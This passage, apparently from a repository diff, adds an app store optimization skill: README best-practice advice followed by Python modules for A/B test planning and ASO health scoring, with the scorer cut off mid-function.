- `create_update_plan()`: Plan update cadence and features
- `optimize_launch_timing()`: Recommend release dates
- `plan_seasonal_campaigns()`: Identify seasonal opportunities

## Best Practices

### Keyword Research
1. **Volume vs. Competition**: Balance high-volume keywords with achievable rankings
2. **Relevance First**: Only target keywords genuinely relevant to your app
3. **Long-Tail Strategy**: Include 3-4 word phrases with lower competition
4. **Continuous Research**: Keyword trends change—research quarterly
5. **Competitor Keywords**: Don't copy blindly; ensure relevance to your features

### Metadata Optimization
1. **Front-Load Keywords**: Place the most important keywords early in the title/description
2. **Natural Language**: Write for humans first, SEO second
3. **Feature Benefits**: Focus on user benefits, not just features
4. **A/B Test Everything**: Test titles, descriptions, and screenshots systematically
5. **Update Regularly**: Refresh metadata with every major update
6. **Character Limits**: Use every character—don't waste valuable space
7. **Apple Keyword Field**: No plurals, no duplicates, no spaces after commas

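The keyword-field rules above can be mechanized: split phrases into single words, dedupe, and pack comma-separated terms until the 100-character cap is reached. An illustrative helper, not the skill's actual `optimize_keyword_field()`:

```python
# Sketch: pack single, deduplicated words into Apple's 100-char field.
def pack_keyword_field(keywords, limit=100):
    """Split phrases into words, dedupe, and fit terms in order under the limit."""
    seen, parts = set(), []
    for kw in keywords:
        for word in kw.lower().split():
            if word not in seen:
                seen.add(word)
                parts.append(word)
    field = ""
    for word in parts:
        candidate = word if not field else field + "," + word
        if len(candidate) > limit:
            break  # stop at the first word that would overflow
        field = candidate
    return field

print(pack_keyword_field(["task manager", "todo list", "Task"]))
# task,manager,todo,list
```

Passing keywords in priority order matters, since the packer keeps the earliest words when the limit forces a cut.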
### Visual Assets
1. **Icon**: Must be recognizable at small sizes (60x60 px)
2. **Screenshots**: The first 2-3 are critical—most users don't scroll
3. **Captions**: Use screenshot captions to tell your value story
4. **Consistency**: Match the visual style to your app design
5. **A/B Test Icons**: The icon is the single most important visual element

### Reviews & Ratings
1. **Respond Quickly**: Reply to reviews within 24-48 hours
2. **Professional Tone**: Always be courteous, even with negative reviews
3. **Address Issues**: Show you're actively fixing reported problems
4. **Thank Supporters**: Acknowledge positive reviews
5. **Prompt Strategically**: Ask for ratings after positive experiences

### Launch Strategy
1. **Soft Launch**: Consider launching in smaller markets first
2. **PR Timing**: Coordinate press coverage with the launch
3. **Update Frequently**: Early updates signal active development
4. **Monitor Closely**: Track metrics daily for the first 2 weeks
5. **Iterate Quickly**: Fix critical issues immediately

### Localization
1. **Prioritize Markets**: Start with English, Spanish, Chinese, French, and German
2. **Native Speakers**: Use professional translators, not machine translation
3. **Cultural Adaptation**: Some features resonate differently by culture
4. **Test Locally**: Have native speakers review before publishing
5. **Measure ROI**: Track downloads by locale to assess impact

## Limitations
|
||||||
|
|
||||||
|
### Data Dependencies
|
||||||
|
- Keyword search volume estimates are approximate (no official data from Apple/Google)
|
||||||
|
- Competitor data may be incomplete for private apps
|
||||||
|
- Review analysis limited to public reviews (can't access private feedback)
|
||||||
|
- Historical data may not be available for new apps
|
||||||
|
|
||||||
|
### Platform Constraints
|
||||||
|
- Apple App Store keyword changes require app submission (except Promotional Text)
|
||||||
|
- Google Play Store metadata changes take 1-2 hours to index
|
||||||
|
- A/B testing requires significant traffic for statistical significance
|
||||||
|
- Store algorithms are proprietary and change without notice
|
||||||
|
|
||||||
|
### Industry Variability

- ASO benchmarks vary significantly by category (games vs. utilities)
- Seasonality affects different categories differently
- Geographic markets have different competitive landscapes
- Cultural preferences impact what works in different countries

### Scope Boundaries

- Does not include paid user acquisition strategies (Apple Search Ads, Google Ads)
- Does not cover app development or UI/UX optimization
- Does not include app analytics implementation (use Firebase, Mixpanel, etc.)
- Does not handle app submission technical issues (provisioning profiles, certificates)

### When NOT to Use This Skill

- For web apps (different SEO strategies apply)
- For enterprise apps not in public stores
- For apps in beta/TestFlight only
- If you need paid advertising strategies (use marketing skills instead)

## Integration with Other Skills

This skill works well with:

- **Content Strategy Skills**: For creating app descriptions and marketing copy
- **Analytics Skills**: For analyzing download and engagement data
- **Localization Skills**: For managing multi-language content
- **Design Skills**: For creating optimized visual assets
- **Marketing Skills**: For coordinating broader launch campaigns

## Version & Updates

This skill is based on current Apple App Store and Google Play Store requirements as of November 2025. Store policies and best practices evolve; verify current requirements before major launches.

**Key Updates to Monitor:**

- Apple App Store Connect updates (apple.com/app-store/review/guidelines)
- Google Play Console updates (play.google.com/console/about/guides/releasewithconfidence)
- iOS/Android version adoption rates (affects device testing)
- Store algorithm changes (follow ASO blogs and communities)
662
skills/app-store-optimization/ab_test_planner.py
Normal file
@@ -0,0 +1,662 @@
"""
A/B testing module for App Store Optimization.
Plans and tracks A/B tests for metadata and visual assets.
"""

from typing import Dict, List, Any, Optional
import math


class ABTestPlanner:
    """Plans and tracks A/B tests for ASO elements."""

    # Minimum detectable effect sizes (conservative estimates)
    MIN_EFFECT_SIZES = {
        'icon': 0.10,         # 10% conversion improvement
        'screenshot': 0.08,   # 8% conversion improvement
        'title': 0.05,        # 5% conversion improvement
        'description': 0.03   # 3% conversion improvement
    }

    # Statistical confidence levels
    CONFIDENCE_LEVELS = {
        'high': 0.95,         # 95% confidence
        'standard': 0.90,     # 90% confidence
        'exploratory': 0.80   # 80% confidence
    }

    def __init__(self):
        """Initialize A/B test planner."""
        self.active_tests = []

    def design_test(
        self,
        test_type: str,
        variant_a: Dict[str, Any],
        variant_b: Dict[str, Any],
        hypothesis: str,
        success_metric: str = 'conversion_rate'
    ) -> Dict[str, Any]:
        """
        Design an A/B test with hypothesis and variables.

        Args:
            test_type: Type of test ('icon', 'screenshot', 'title', 'description')
            variant_a: Control variant details
            variant_b: Test variant details
            hypothesis: Expected outcome hypothesis
            success_metric: Metric to optimize

        Returns:
            Test design with configuration
        """
        test_design = {
            'test_id': self._generate_test_id(test_type),
            'test_type': test_type,
            'hypothesis': hypothesis,
            'variants': {
                'a': {
                    'name': 'Control',
                    'details': variant_a,
                    'traffic_split': 0.5
                },
                'b': {
                    'name': 'Variation',
                    'details': variant_b,
                    'traffic_split': 0.5
                }
            },
            'success_metric': success_metric,
            'secondary_metrics': self._get_secondary_metrics(test_type),
            'minimum_effect_size': self.MIN_EFFECT_SIZES.get(test_type, 0.05),
            'recommended_confidence': 'standard',
            'best_practices': self._get_test_best_practices(test_type)
        }

        self.active_tests.append(test_design)
        return test_design

    def calculate_sample_size(
        self,
        baseline_conversion: float,
        minimum_detectable_effect: float,
        confidence_level: str = 'standard',
        power: float = 0.80
    ) -> Dict[str, Any]:
        """
        Calculate required sample size for statistical significance.

        Args:
            baseline_conversion: Current conversion rate (0-1)
            minimum_detectable_effect: Minimum relative effect size to detect (0-1)
            confidence_level: 'high', 'standard', or 'exploratory'
            power: Statistical power (typically 0.80 or 0.90)

        Returns:
            Sample size calculation with duration estimates
        """
        alpha = 1 - self.CONFIDENCE_LEVELS[confidence_level]

        # Expected conversion for variant B
        expected_conversion_b = baseline_conversion * (1 + minimum_detectable_effect)

        # Z-scores for significance level and power
        z_alpha = self._get_z_score(1 - alpha / 2)  # Two-tailed test
        z_beta = self._get_z_score(power)

        # Pooled standard deviation
        p_pooled = (baseline_conversion + expected_conversion_b) / 2
        sd_pooled = math.sqrt(2 * p_pooled * (1 - p_pooled))

        # Sample size per variant
        n_per_variant = math.ceil(
            ((z_alpha + z_beta) ** 2 * sd_pooled ** 2) /
            ((expected_conversion_b - baseline_conversion) ** 2)
        )

        total_sample_size = n_per_variant * 2

        # Estimate duration based on typical traffic
        duration_estimates = self._estimate_test_duration(
            total_sample_size,
            baseline_conversion
        )

        return {
            'sample_size_per_variant': n_per_variant,
            'total_sample_size': total_sample_size,
            'baseline_conversion': baseline_conversion,
            'expected_conversion_improvement': minimum_detectable_effect,
            'expected_conversion_b': expected_conversion_b,
            'confidence_level': confidence_level,
            'statistical_power': power,
            'duration_estimates': duration_estimates,
            'recommendations': self._generate_sample_size_recommendations(
                n_per_variant,
                duration_estimates
            )
        }

    def calculate_significance(
        self,
        variant_a_conversions: int,
        variant_a_visitors: int,
        variant_b_conversions: int,
        variant_b_visitors: int
    ) -> Dict[str, Any]:
        """
        Calculate statistical significance of test results.

        Args:
            variant_a_conversions: Conversions for control
            variant_a_visitors: Visitors for control
            variant_b_conversions: Conversions for variation
            variant_b_visitors: Visitors for variation

        Returns:
            Significance analysis with decision recommendation
        """
        # Calculate conversion rates
        rate_a = variant_a_conversions / variant_a_visitors if variant_a_visitors > 0 else 0
        rate_b = variant_b_conversions / variant_b_visitors if variant_b_visitors > 0 else 0

        # Calculate improvement
        if rate_a > 0:
            relative_improvement = (rate_b - rate_a) / rate_a
        else:
            relative_improvement = 0

        absolute_improvement = rate_b - rate_a

        # Calculate standard error
        se_a = math.sqrt(rate_a * (1 - rate_a) / variant_a_visitors) if variant_a_visitors > 0 else 0
        se_b = math.sqrt(rate_b * (1 - rate_b) / variant_b_visitors) if variant_b_visitors > 0 else 0
        se_diff = math.sqrt(se_a ** 2 + se_b ** 2)

        # Calculate z-score
        z_score = absolute_improvement / se_diff if se_diff > 0 else 0

        # Calculate p-value (two-tailed)
        p_value = 2 * (1 - self._standard_normal_cdf(abs(z_score)))

        # Determine significance
        is_significant_95 = p_value < 0.05
        is_significant_90 = p_value < 0.10

        # Generate decision
        decision = self._generate_test_decision(
            relative_improvement,
            is_significant_95,
            is_significant_90,
            variant_a_visitors + variant_b_visitors
        )

        return {
            'variant_a': {
                'conversions': variant_a_conversions,
                'visitors': variant_a_visitors,
                'conversion_rate': round(rate_a, 4)
            },
            'variant_b': {
                'conversions': variant_b_conversions,
                'visitors': variant_b_visitors,
                'conversion_rate': round(rate_b, 4)
            },
            'improvement': {
                'absolute': round(absolute_improvement, 4),
                'relative_percentage': round(relative_improvement * 100, 2)
            },
            'statistical_analysis': {
                'z_score': round(z_score, 3),
                'p_value': round(p_value, 4),
                'is_significant_95': is_significant_95,
                'is_significant_90': is_significant_90,
                'confidence_level': '95%' if is_significant_95 else ('90%' if is_significant_90 else 'Not significant')
            },
            'decision': decision
        }

    def track_test_results(
        self,
        test_id: str,
        results_data: Dict[str, Any]
    ) -> Dict[str, Any]:
        """
        Track ongoing test results and provide recommendations.

        Args:
            test_id: Test identifier
            results_data: Current test results

        Returns:
            Test tracking report with next steps
        """
        # Find test
        test = next((t for t in self.active_tests if t['test_id'] == test_id), None)
        if not test:
            return {'error': f'Test {test_id} not found'}

        # Calculate significance
        significance = self.calculate_significance(
            results_data['variant_a_conversions'],
            results_data['variant_a_visitors'],
            results_data['variant_b_conversions'],
            results_data['variant_b_visitors']
        )

        # Calculate test progress
        total_visitors = results_data['variant_a_visitors'] + results_data['variant_b_visitors']
        required_sample = results_data.get('required_sample_size', 10000)
        progress_percentage = min((total_visitors / required_sample) * 100, 100)

        # Generate recommendations
        recommendations = self._generate_tracking_recommendations(
            significance,
            progress_percentage,
            test['test_type']
        )

        return {
            'test_id': test_id,
            'test_type': test['test_type'],
            'progress': {
                'total_visitors': total_visitors,
                'required_sample_size': required_sample,
                'progress_percentage': round(progress_percentage, 1),
                'is_complete': progress_percentage >= 100
            },
            'current_results': significance,
            'recommendations': recommendations,
            'next_steps': self._determine_next_steps(
                significance,
                progress_percentage
            )
        }

    def generate_test_report(
        self,
        test_id: str,
        final_results: Dict[str, Any]
    ) -> Dict[str, Any]:
        """
        Generate final test report with insights and recommendations.

        Args:
            test_id: Test identifier
            final_results: Final test results

        Returns:
            Comprehensive test report
        """
        test = next((t for t in self.active_tests if t['test_id'] == test_id), None)
        if not test:
            return {'error': f'Test {test_id} not found'}

        significance = self.calculate_significance(
            final_results['variant_a_conversions'],
            final_results['variant_a_visitors'],
            final_results['variant_b_conversions'],
            final_results['variant_b_visitors']
        )

        # Generate insights
        insights = self._generate_test_insights(
            test,
            significance,
            final_results
        )

        # Implementation plan
        implementation_plan = self._create_implementation_plan(
            test,
            significance
        )

        return {
            'test_summary': {
                'test_id': test_id,
                'test_type': test['test_type'],
                'hypothesis': test['hypothesis'],
                'duration_days': final_results.get('duration_days', 'N/A')
            },
            'results': significance,
            'insights': insights,
            'implementation_plan': implementation_plan,
            'learnings': self._extract_learnings(test, significance)
        }

    def _generate_test_id(self, test_type: str) -> str:
        """Generate unique test ID."""
        import time
        timestamp = int(time.time())
        return f"{test_type}_{timestamp}"

    def _get_secondary_metrics(self, test_type: str) -> List[str]:
        """Get secondary metrics to track for test type."""
        metrics_map = {
            'icon': ['tap_through_rate', 'impression_count', 'brand_recall'],
            'screenshot': ['tap_through_rate', 'time_on_page', 'scroll_depth'],
            'title': ['impression_count', 'tap_through_rate', 'search_visibility'],
            'description': ['time_on_page', 'scroll_depth', 'tap_through_rate']
        }
        return metrics_map.get(test_type, ['tap_through_rate'])

    def _get_test_best_practices(self, test_type: str) -> List[str]:
        """Get best practices for specific test type."""
        practices_map = {
            'icon': [
                'Test only one element at a time (color vs. style vs. symbolism)',
                'Ensure icon is recognizable at small sizes (60x60px)',
                'Consider cultural context for global audience',
                'Test against top competitor icons'
            ],
            'screenshot': [
                'Test order of screenshots (users see first 2-3)',
                'Use captions to tell a story',
                'Show key features and benefits',
                'Test with and without device frames'
            ],
            'title': [
                'Test keyword variations, not a major rebrand',
                'Keep brand name consistent',
                'Ensure title fits within character limits',
                'Test in both search and browse contexts'
            ],
            'description': [
                'Test structure (bullet points vs. paragraphs)',
                'Test call-to-action placement',
                'Test feature vs. benefit focus',
                'Maintain keyword density'
            ]
        }
        return practices_map.get(test_type, ['Test one variable at a time'])

    def _estimate_test_duration(
        self,
        required_sample_size: int,
        baseline_conversion: float
    ) -> Dict[str, Any]:
        """Estimate test duration based on typical traffic levels."""
        # Assume different daily traffic scenarios
        traffic_scenarios = {
            'low': 100,      # 100 page views/day
            'medium': 1000,  # 1000 page views/day
            'high': 10000    # 10000 page views/day
        }

        estimates = {}
        for scenario, daily_views in traffic_scenarios.items():
            days = math.ceil(required_sample_size / daily_views)
            estimates[scenario] = {
                'daily_page_views': daily_views,
                'estimated_days': days,
                'estimated_weeks': round(days / 7, 1)
            }

        return estimates

    def _generate_sample_size_recommendations(
        self,
        sample_size: int,
        duration_estimates: Dict[str, Any]
    ) -> List[str]:
        """Generate recommendations based on sample size."""
        recommendations = []

        if sample_size > 50000:
            recommendations.append(
                "Large sample size required - consider a larger minimum detectable effect or increasing traffic"
            )

        if duration_estimates['medium']['estimated_days'] > 30:
            recommendations.append(
                "Long test duration - consider a higher minimum detectable effect or focus on high-impact changes"
            )

        if duration_estimates['low']['estimated_days'] > 60:
            recommendations.append(
                "Insufficient traffic for reliable testing - consider user acquisition or broader targeting"
            )

        if not recommendations:
            recommendations.append("Sample size and duration are reasonable for this test")

        return recommendations

    def _get_z_score(self, percentile: float) -> float:
        """Get z-score for given percentile (lookup approximation)."""
        # Common z-scores
        z_scores = {
            0.80: 0.84,
            0.85: 1.04,
            0.90: 1.28,
            0.95: 1.645,
            0.975: 1.96,
            0.99: 2.33
        }
        return z_scores.get(percentile, 1.96)

    def _standard_normal_cdf(self, z: float) -> float:
        """Approximate the standard normal cumulative distribution function."""
        # Polynomial approximation via the error function (Abramowitz & Stegun)
        t = 1.0 / (1.0 + 0.2316419 * abs(z))
        d = 0.3989423 * math.exp(-z * z / 2.0)
        p = d * t * (0.3193815 + t * (-0.3565638 + t * (1.781478 + t * (-1.821256 + t * 1.330274))))

        if z > 0:
            return 1.0 - p
        else:
            return p

    def _generate_test_decision(
        self,
        improvement: float,
        is_significant_95: bool,
        is_significant_90: bool,
        total_visitors: int
    ) -> Dict[str, Any]:
        """Generate test decision and recommendation."""
        if total_visitors < 1000:
            return {
                'decision': 'continue',
                'rationale': 'Insufficient data - continue test to reach minimum sample size',
                'action': 'Keep test running'
            }

        if is_significant_95:
            if improvement > 0:
                return {
                    'decision': 'implement_b',
                    'rationale': f'Variant B shows {improvement * 100:.1f}% improvement with 95% confidence',
                    'action': 'Implement Variant B'
                }
            else:
                return {
                    'decision': 'keep_a',
                    'rationale': 'Variant A performs better with 95% confidence',
                    'action': 'Keep current version (A)'
                }

        elif is_significant_90:
            if improvement > 0:
                return {
                    'decision': 'implement_b_cautiously',
                    'rationale': f'Variant B shows {improvement * 100:.1f}% improvement with 90% confidence',
                    'action': 'Consider implementing B, monitor closely'
                }
            else:
                return {
                    'decision': 'keep_a',
                    'rationale': 'Variant A performs better with 90% confidence',
                    'action': 'Keep current version (A)'
                }

        else:
            return {
                'decision': 'inconclusive',
                'rationale': 'No statistically significant difference detected',
                'action': 'Either keep A or test a different hypothesis'
            }

    def _generate_tracking_recommendations(
        self,
        significance: Dict[str, Any],
        progress: float,
        test_type: str
    ) -> List[str]:
        """Generate recommendations for ongoing test."""
        recommendations = []

        if progress < 50:
            recommendations.append(
                f"Test is {progress:.0f}% complete - continue collecting data"
            )

        if progress >= 100:
            if significance['statistical_analysis']['is_significant_95']:
                recommendations.append(
                    "Sufficient data collected with significant results - ready to conclude test"
                )
            else:
                recommendations.append(
                    "Sample size reached but no significant difference - consider extending test or concluding"
                )

        return recommendations

    def _determine_next_steps(
        self,
        significance: Dict[str, Any],
        progress: float
    ) -> str:
        """Determine next steps for test."""
        if progress < 100:
            return f"Continue test until reaching 100% sample size (currently {progress:.0f}%)"

        decision = significance.get('decision', {}).get('decision', 'inconclusive')

        if decision == 'implement_b':
            return "Implement Variant B and monitor metrics for 2 weeks"
        elif decision == 'keep_a':
            return "Keep Variant A and design a new test with a different hypothesis"
        else:
            return "Test inconclusive - either keep A or design a new test"

    def _generate_test_insights(
        self,
        test: Dict[str, Any],
        significance: Dict[str, Any],
        results: Dict[str, Any]
    ) -> List[str]:
        """Generate insights from test results."""
        insights = []

        improvement = significance['improvement']['relative_percentage']

        if significance['statistical_analysis']['is_significant_95']:
            insights.append(
                f"Strong evidence: Variant B {'improved' if improvement > 0 else 'decreased'} "
                f"conversion by {abs(improvement):.1f}% with 95% confidence"
            )

        insights.append(
            f"Tested {test['test_type']} changes: {test['hypothesis']}"
        )

        # Add context-specific insights
        if test['test_type'] == 'icon' and improvement > 5:
            insights.append(
                "Icon change had substantial impact - visual first impression is critical"
            )

        return insights

    def _create_implementation_plan(
        self,
        test: Dict[str, Any],
        significance: Dict[str, Any]
    ) -> List[Dict[str, str]]:
        """Create implementation plan for winning variant."""
        plan = []

        if significance.get('decision', {}).get('decision') == 'implement_b':
            plan.append({
                'step': '1. Update store listing',
                'details': f"Replace {test['test_type']} with Variant B across all platforms"
            })
            plan.append({
                'step': '2. Monitor metrics',
                'details': 'Track conversion rate for 2 weeks to confirm sustained improvement'
            })
            plan.append({
                'step': '3. Document learnings',
                'details': 'Record insights for future optimization'
            })

        return plan

    def _extract_learnings(
        self,
        test: Dict[str, Any],
        significance: Dict[str, Any]
    ) -> List[str]:
        """Extract key learnings from test."""
        learnings = []

        improvement = significance['improvement']['relative_percentage']

        learnings.append(
            f"Testing {test['test_type']} can yield a {abs(improvement):.1f}% conversion change"
        )

        if test['test_type'] == 'title':
            learnings.append(
                "Title changes affect search visibility and user perception"
            )
        elif test['test_type'] == 'screenshot':
            learnings.append(
                "First 2-3 screenshots are critical for conversion"
            )

        return learnings


def plan_ab_test(
    test_type: str,
    variant_a: Dict[str, Any],
    variant_b: Dict[str, Any],
    hypothesis: str,
    baseline_conversion: float
) -> Dict[str, Any]:
    """
    Convenience function to plan an A/B test.

    Args:
        test_type: Type of test
        variant_a: Control variant
        variant_b: Test variant
        hypothesis: Test hypothesis
        baseline_conversion: Current conversion rate

    Returns:
        Complete test plan
    """
    planner = ABTestPlanner()

    test_design = planner.design_test(
        test_type,
        variant_a,
        variant_b,
        hypothesis
    )

    sample_size = planner.calculate_sample_size(
        baseline_conversion,
        planner.MIN_EFFECT_SIZES.get(test_type, 0.05)
    )

    return {
        'test_design': test_design,
        'sample_size_requirements': sample_size
    }
482
skills/app-store-optimization/aso_scorer.py
Normal file
@@ -0,0 +1,482 @@
|
|||||||
|
"""
|
||||||
|
ASO scoring module for App Store Optimization.
|
||||||
|
Calculates comprehensive ASO health score across multiple dimensions.
|
||||||
|
"""
|
||||||
|
|
||||||
|
from typing import Dict, List, Any, Optional
|
||||||
|
|
||||||
|
|
||||||
|
class ASOScorer:
|
||||||
|
"""Calculates overall ASO health score and provides recommendations."""
|
||||||
|
|
||||||
|
# Score weights for different components (total = 100)
|
||||||
|
WEIGHTS = {
|
||||||
|
'metadata_quality': 25,
|
||||||
|
'ratings_reviews': 25,
|
||||||
|
'keyword_performance': 25,
|
||||||
|
'conversion_metrics': 25
|
||||||
|
}
|
||||||
|
|
||||||
|
# Benchmarks for scoring
|
||||||
|
BENCHMARKS = {
|
||||||
|
'title_keyword_usage': {'min': 1, 'target': 2},
|
||||||
|
'description_length': {'min': 500, 'target': 2000},
|
||||||
|
'keyword_density': {'min': 2, 'optimal': 5, 'max': 8},
|
||||||
|
'average_rating': {'min': 3.5, 'target': 4.5},
|
||||||
|
'ratings_count': {'min': 100, 'target': 5000},
|
||||||
|
'keywords_top_10': {'min': 2, 'target': 10},
|
||||||
|
'keywords_top_50': {'min': 5, 'target': 20},
|
||||||
|
'conversion_rate': {'min': 0.02, 'target': 0.10}
|
||||||
|
}
|
||||||
|
|
||||||
|
def __init__(self):
|
||||||
|
"""Initialize ASO scorer."""
|
||||||
|
self.score_breakdown = {}
|
||||||
|
|
||||||
|
def calculate_overall_score(
|
||||||
|
self,
|
||||||
|
metadata: Dict[str, Any],
|
||||||
|
ratings: Dict[str, Any],
|
||||||
|
keyword_performance: Dict[str, Any],
|
||||||
|
conversion: Dict[str, Any]
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Calculate comprehensive ASO score (0-100).
|
||||||
|
|
||||||
|
Args:
|
||||||
|
metadata: Title, description quality metrics
|
||||||
|
ratings: Rating average and count
|
||||||
|
keyword_performance: Keyword ranking data
|
||||||
|
conversion: Impression-to-install metrics
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Overall score with detailed breakdown
|
||||||
|
"""
|
||||||
|
# Calculate component scores
|
||||||
|
metadata_score = self.score_metadata_quality(metadata)
|
||||||
|
ratings_score = self.score_ratings_reviews(ratings)
|
||||||
|
keyword_score = self.score_keyword_performance(keyword_performance)
|
||||||
|
conversion_score = self.score_conversion_metrics(conversion)
|
||||||
|
|
||||||
|
# Calculate weighted overall score
|
||||||
|
overall_score = (
|
||||||
|
metadata_score * (self.WEIGHTS['metadata_quality'] / 100) +
|
||||||
|
ratings_score * (self.WEIGHTS['ratings_reviews'] / 100) +
|
||||||
|
keyword_score * (self.WEIGHTS['keyword_performance'] / 100) +
|
||||||
|
conversion_score * (self.WEIGHTS['conversion_metrics'] / 100)
|
||||||
|
)
|
||||||
|
|
||||||
|
# Store breakdown
|
||||||
|
self.score_breakdown = {
|
||||||
|
'metadata_quality': {
|
||||||
|
'score': metadata_score,
|
||||||
|
'weight': self.WEIGHTS['metadata_quality'],
|
||||||
|
'weighted_contribution': round(metadata_score * (self.WEIGHTS['metadata_quality'] / 100), 1)
|
||||||
|
},
|
||||||
|
'ratings_reviews': {
|
||||||
|
'score': ratings_score,
|
||||||
|
'weight': self.WEIGHTS['ratings_reviews'],
|
||||||
|
'weighted_contribution': round(ratings_score * (self.WEIGHTS['ratings_reviews'] / 100), 1)
|
||||||
|
},
|
||||||
|
'keyword_performance': {
|
||||||
|
'score': keyword_score,
|
||||||
|
                'weight': self.WEIGHTS['keyword_performance'],
                'weighted_contribution': round(keyword_score * (self.WEIGHTS['keyword_performance'] / 100), 1)
            },
            'conversion_metrics': {
                'score': conversion_score,
                'weight': self.WEIGHTS['conversion_metrics'],
                'weighted_contribution': round(conversion_score * (self.WEIGHTS['conversion_metrics'] / 100), 1)
            }
        }

        # Generate recommendations
        recommendations = self.generate_recommendations(
            metadata_score,
            ratings_score,
            keyword_score,
            conversion_score
        )

        # Assess overall health
        health_status = self._assess_health_status(overall_score)

        return {
            'overall_score': round(overall_score, 1),
            'health_status': health_status,
            'score_breakdown': self.score_breakdown,
            'recommendations': recommendations,
            'priority_actions': self._prioritize_actions(recommendations),
            'strengths': self._identify_strengths(self.score_breakdown),
            'weaknesses': self._identify_weaknesses(self.score_breakdown)
        }

    def score_metadata_quality(self, metadata: Dict[str, Any]) -> float:
        """
        Score metadata quality (0-100).

        Evaluates:
        - Title optimization
        - Description quality
        - Keyword usage
        """
        scores = []

        # Title score (0-35 points)
        title_keywords = metadata.get('title_keyword_count', 0)
        title_length = metadata.get('title_length', 0)

        if title_keywords >= self.BENCHMARKS['title_keyword_usage']['target']:
            title_score = 35
        elif title_keywords >= self.BENCHMARKS['title_keyword_usage']['min']:
            title_score = 25
        else:
            title_score = 10

        # Penalize titles that leave most of the available space unused
        if title_length <= 25:
            title_score -= 5

        scores.append(min(title_score, 35))

        # Description score (0-35 points)
        desc_length = metadata.get('description_length', 0)
        desc_quality = metadata.get('description_quality', 0.0)  # 0-1 scale

        if desc_length >= self.BENCHMARKS['description_length']['target']:
            desc_score = 25
        elif desc_length >= self.BENCHMARKS['description_length']['min']:
            desc_score = 15
        else:
            desc_score = 5

        # Add quality bonus
        desc_score += desc_quality * 10
        scores.append(min(desc_score, 35))

        # Keyword density score (0-30 points)
        keyword_density = metadata.get('keyword_density', 0.0)

        if self.BENCHMARKS['keyword_density']['min'] <= keyword_density <= self.BENCHMARKS['keyword_density']['optimal']:
            density_score = 30
        elif keyword_density < self.BENCHMARKS['keyword_density']['min']:
            # Too low - proportional scoring
            density_score = (keyword_density / self.BENCHMARKS['keyword_density']['min']) * 20
        else:
            # Too high (keyword stuffing) - penalty
            excess = keyword_density - self.BENCHMARKS['keyword_density']['optimal']
            density_score = max(30 - (excess * 5), 0)

        scores.append(density_score)

        return round(sum(scores), 1)
    def score_ratings_reviews(self, ratings: Dict[str, Any]) -> float:
        """
        Score ratings and reviews (0-100).

        Evaluates:
        - Average rating
        - Total ratings count
        - Review velocity
        """
        average_rating = ratings.get('average_rating', 0.0)
        total_ratings = ratings.get('total_ratings', 0)
        recent_ratings = ratings.get('recent_ratings_30d', 0)

        # Rating quality score (0-50 points)
        if average_rating >= self.BENCHMARKS['average_rating']['target']:
            rating_quality_score = 50
        elif average_rating >= self.BENCHMARKS['average_rating']['min']:
            # Proportional scoring between min and target
            proportion = (average_rating - self.BENCHMARKS['average_rating']['min']) / \
                         (self.BENCHMARKS['average_rating']['target'] - self.BENCHMARKS['average_rating']['min'])
            rating_quality_score = 30 + (proportion * 20)
        elif average_rating >= 3.0:
            rating_quality_score = 20
        else:
            rating_quality_score = 10

        # Rating volume score (0-30 points)
        if total_ratings >= self.BENCHMARKS['ratings_count']['target']:
            rating_volume_score = 30
        elif total_ratings >= self.BENCHMARKS['ratings_count']['min']:
            # Proportional scoring
            proportion = (total_ratings - self.BENCHMARKS['ratings_count']['min']) / \
                         (self.BENCHMARKS['ratings_count']['target'] - self.BENCHMARKS['ratings_count']['min'])
            rating_volume_score = 15 + (proportion * 15)
        else:
            # Very low volume
            rating_volume_score = (total_ratings / self.BENCHMARKS['ratings_count']['min']) * 15

        # Rating velocity score (0-20 points)
        if recent_ratings > 100:
            velocity_score = 20
        elif recent_ratings > 50:
            velocity_score = 15
        elif recent_ratings > 10:
            velocity_score = 10
        else:
            velocity_score = 5

        total_score = rating_quality_score + rating_volume_score + velocity_score

        return round(min(total_score, 100), 1)
    def score_keyword_performance(self, keyword_performance: Dict[str, Any]) -> float:
        """
        Score keyword ranking performance (0-100).

        Evaluates:
        - Top 10 rankings
        - Top 50 rankings
        - Ranking trends
        """
        top_10_count = keyword_performance.get('top_10', 0)
        top_50_count = keyword_performance.get('top_50', 0)
        top_100_count = keyword_performance.get('top_100', 0)
        improving_keywords = keyword_performance.get('improving_keywords', 0)

        # Top 10 score (0-50 points) - most valuable rankings
        if top_10_count >= self.BENCHMARKS['keywords_top_10']['target']:
            top_10_score = 50
        elif top_10_count >= self.BENCHMARKS['keywords_top_10']['min']:
            proportion = (top_10_count - self.BENCHMARKS['keywords_top_10']['min']) / \
                         (self.BENCHMARKS['keywords_top_10']['target'] - self.BENCHMARKS['keywords_top_10']['min'])
            top_10_score = 25 + (proportion * 25)
        else:
            top_10_score = (top_10_count / self.BENCHMARKS['keywords_top_10']['min']) * 25

        # Top 50 score (0-30 points)
        if top_50_count >= self.BENCHMARKS['keywords_top_50']['target']:
            top_50_score = 30
        elif top_50_count >= self.BENCHMARKS['keywords_top_50']['min']:
            proportion = (top_50_count - self.BENCHMARKS['keywords_top_50']['min']) / \
                         (self.BENCHMARKS['keywords_top_50']['target'] - self.BENCHMARKS['keywords_top_50']['min'])
            top_50_score = 15 + (proportion * 15)
        else:
            top_50_score = (top_50_count / self.BENCHMARKS['keywords_top_50']['min']) * 15

        # Coverage score (0-10 points) - based on top 100
        coverage_score = min((top_100_count / 30) * 10, 10)

        # Trend score (0-10 points) - are rankings improving?
        if improving_keywords > 5:
            trend_score = 10
        elif improving_keywords > 0:
            trend_score = 5
        else:
            trend_score = 0

        total_score = top_10_score + top_50_score + coverage_score + trend_score

        return round(min(total_score, 100), 1)
    def score_conversion_metrics(self, conversion: Dict[str, Any]) -> float:
        """
        Score conversion performance (0-100).

        Evaluates:
        - Impression-to-install conversion rate
        - Download velocity
        """
        conversion_rate = conversion.get('impression_to_install', 0.0)
        downloads_30d = conversion.get('downloads_last_30_days', 0)
        downloads_trend = conversion.get('downloads_trend', 'stable')  # 'up', 'stable', 'down'

        # Conversion rate score (0-70 points)
        if conversion_rate >= self.BENCHMARKS['conversion_rate']['target']:
            conversion_score = 70
        elif conversion_rate >= self.BENCHMARKS['conversion_rate']['min']:
            proportion = (conversion_rate - self.BENCHMARKS['conversion_rate']['min']) / \
                         (self.BENCHMARKS['conversion_rate']['target'] - self.BENCHMARKS['conversion_rate']['min'])
